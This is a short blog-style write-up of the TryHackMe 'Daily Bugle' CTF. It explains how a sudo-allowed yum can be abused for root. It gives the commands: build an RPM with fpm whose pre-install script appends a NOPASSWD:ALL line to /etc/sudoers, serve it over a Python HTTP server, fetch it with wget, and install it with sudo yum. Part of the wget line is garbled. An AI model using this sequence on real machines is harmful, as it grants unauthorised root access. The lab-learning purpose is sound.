# Sudoers entry - Yum
So, while doing a CTF on tryhackme: dailybugle, I found that my current user (jjameson) was allowed to run **/usr/bin/yum** as root without password. please read previous post to find out what "sudoers" is.
With the help of [gtfobins](https://gtfobins.github.io/gtfobins/yum/), we found a method to elevate privileges using yum.
Process is simple enough. Create a shell script (that you wanna execute- it will have our malicious code)->make an RPM package using [fpm](https://fpm.readthedocs.io/en/latest/installation.html) tool->Upload it on the victim machine->execute using yum command. (note: in red hat/centOS Yum is the package manager that's why we need to use rpm to build an executable. Similar case exists for Debian/Ubuntu systems where we'll use apt-get to elevate privileges)
**`gem install fpm`**
**`apt install rpm`**
Here, I'll be adding my current user in the sudoers file for privilege escalation. This is by far the easiest method I have discovered.\
echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh
**`fpm -n root -s dir -t rpm -a all --before-install my.sh .`**
Launch a python server now\
\&#xNAN;**`python3 -m http.server 80`**
On the victim machine, download this in the /tmp directory and we are good to go with installation of this package with the commands:
\
\&#xNAN;**`wget /root-1.0-1.noarch.rpm`**\
**`sudo yum localinstall -y root-1.0-1.noarch.rpm`**
Once the installation has successfully completed we will run a simple bash shell using sudo (**sudo bash**) and you'll observe that jjameson doesn't require password to run anything as root because our script "my.sh" has been executed as part of the RPM package we just created. This is how we will escalate our privileges using yum.
